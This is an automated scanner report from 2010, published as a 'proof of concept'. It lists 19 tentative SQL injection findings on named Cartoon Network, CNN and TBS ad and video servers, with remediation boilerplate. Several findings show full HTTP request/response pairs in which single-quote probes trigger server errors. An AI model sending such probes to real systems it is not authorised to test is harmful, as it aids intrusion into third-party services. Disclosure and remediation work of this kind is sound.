SQL Injection, CWE-89, Proof of Concept | Hoyt LLC Research

Loading
Loading

SQL Injection, Database Injection, Vulnerability Crawler


Report generated by XSS.CX at Sat Dec 11 06:40:07 CST 2010.


SQL Injection, CWE-89 Example

1. SQL injection

1.1. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW [REST URL parameter 2]

1.2. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq [REST URL parameter 2]

1.3. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr [REST URL parameter 2]

1.4. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj [REST URL parameter 2]

1.5. http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage¶ms.styles=fs&tile=3795625302922&domId=97279 [User-Agent HTTP header]

1.6. http://ads.cnn.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]

1.7. http://ads.cnn.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]

1.8. http://ads.cnn.com/event.ng/Type=click&FlightID=332166&AdID=477790&TargetID=5468&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Values=47781&Redirect=[ewclickthru] [REST URL parameter 2]

1.9. http://ads.cnn.com/event.ng/Type=click&FlightID=347834&AdID=478322&TargetID=79730&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/redacted/click [REST URL parameter 2]

1.10. http://ads.tbs.com/event.ng/Type=click&FlightID=323707&AdID=441483&TargetID=74923&Segments=2743,3285,4134,4135,24537,29397,29870,30337,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74923&Values=46,60,85,100,1266,4450,47781,47818,52899,56058,57005,57006,58702,59927,59937,59939,61089,61887,61913,63498&RawValues=TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/games/index.html/ [REST URL parameter 2]

1.11. http://ads.tbs.com/event.ng/Type=click&FlightID=323708&AdID=441484&TargetID=74924&Segments=2743,3285,4134,4135,24537,29397,29870,30529,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,74924&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,59927,59937,59940,61089,61887,61913,63498&RawValues=NGUSERID,a3d006c-9411-1871071071-1,TIL,3795625302921&Redirect=http:/www.cartoonnetwork.com/video/index.html/ [REST URL parameter 2]

1.12. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getAllEpisodes [networkName parameter]

1.13. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [filterByCollectionId parameter]

1.14. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [id parameter]

1.15. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByCategory [networkName parameter]

1.16. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getEpisodesByShow [networkName parameter]

1.17. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getFeaturedEpisode [networkName parameter]

1.18. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [filterByCollectionId parameter]

1.19. http://cnvideosvc2.cartoonnetwork.com/svc/episodeSearch/getMoreEpisodesLike [networkName parameter]



1. SQL injection
There are 19 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&params.styles=fs&tile=7355535302921&domId=89496
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:47:21 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=472781&FlightID=345105&TargetID=105191&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4677,4960,11948,19419,24537,28173,31159,31774,32749,33852,36742,37272,37430,37605,37606,37607,37612,39847,40253,40617,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,66830,77699,107525,107666,88092,110999,105191,103340,105451,111147&Values=46,60,85,100,150,682,685,917,1063,1285,1678,1690,1735,1815,4450,38253,47118,47457,47781,47892,52263,52899,56058,56872,57005,57006,58702,61089,61263,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C7355535302921&random=caginve,bgqfzjgkorfyW HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&params.styles=fs&tile=7355535302921&domId=89496
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:47:21 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:47:21 GMT
Content-Type: text/html


1.2. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:46:56 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477777&FlightID=332167&TargetID=73794&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,19464,20750,24537,33852,37272,37430,40253,42274,42275,43109,43377,43752,44046,44047,44049,45046,45072&Targets=1515,75884,109020,109382,109428,109447,109572,109650,109724,109725,109730,73794,93466,50467,61988,107664,107652,111142&Values=46,60,85,100,150,1266,4450,47781,47818,50018,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=dfWwIxv,bgqfzgxkoqWpq HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=300x250_rgt&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=97279
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:46:56 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:46:56 GMT
Content-Type: text/html


1.3. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:46:57 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=477790&FlightID=332166&TargetID=5468&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,4677,11948,24537,28173,31774,33852,37272,37430,40253,41858,42274,42275,42673,43109,43752,44046,44047,44049,45046,45073,45075&Targets=1515,96860,101128,81280,105725,105728,106307,106408,107168,107174,107395,107727,5468,66830,107666,107651,88092,103340,105451,111147&Values=46,60,85,100,150,1266,4450,47781,47818,47892,52263,52899,56058,57005,57006,58702,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302922&random=cghdRtw,bgqfzgxkoqWpr HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=728x90_top&toon_rollup=homepage&params.styles=fs&tile=3795625302922&domId=155101
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:46:57 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:46:57 GMT
Content-Type: text/html


1.4. http://ads.cartoonnetwork.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.cartoonnetwork.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_skin&toon_rollup=homepage&params.styles=fs&tile=3795625302921&domId=114568
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 1

HTTP/1.1 500 Internal Server Error
Date: Sat, 11 Dec 2010 02:46:55 GMT
Server: Apache
Content-Length: 609
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=478322&FlightID=347834&TargetID=79730&SiteID=47781&EntityDefResetFlag=0&C=0&Segments=2743,3285,4135,24537,32860,33852,37272,37430,40253,42274,42275,43109,43752,44046,44047,44049,45046&Targets=1515,79730&Values=46,60,85,100,150,1266,4450,47781,47818,52263,52899,56058,57005,57006,58702,60503,61089,61887,61913,63498&RawValues=NGUSERID%2Ca3d006c-9411-1871071071-1%2CTIL%2C3795625302921&random=dmnurxk,bgqfzgxkoqWpj HTTP/1.1
Host: ads.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://ads.cartoonnetwork.com/html.ng/site=toon&toon_pos=1x1_skin&toon_rollup=homepage&params.styles=fs&tile=3795625302921&domId=114568
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d006c-9411-1871071071-1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]

Response 2

HTTP/1.1 302 Found
Date: Sat, 11 Dec 2010 02:46:55 GMT
Server: Apache
Pragma: no-cache
Content-Length: 0
Cache-control: no-cache, max-age=0, no-cache, private
Location: http://i.cdn.turner.com/cnn/images/1.gif
Expires: Sat, 11 Dec 2010 02:46:55 GMT
Content-Type: text/html


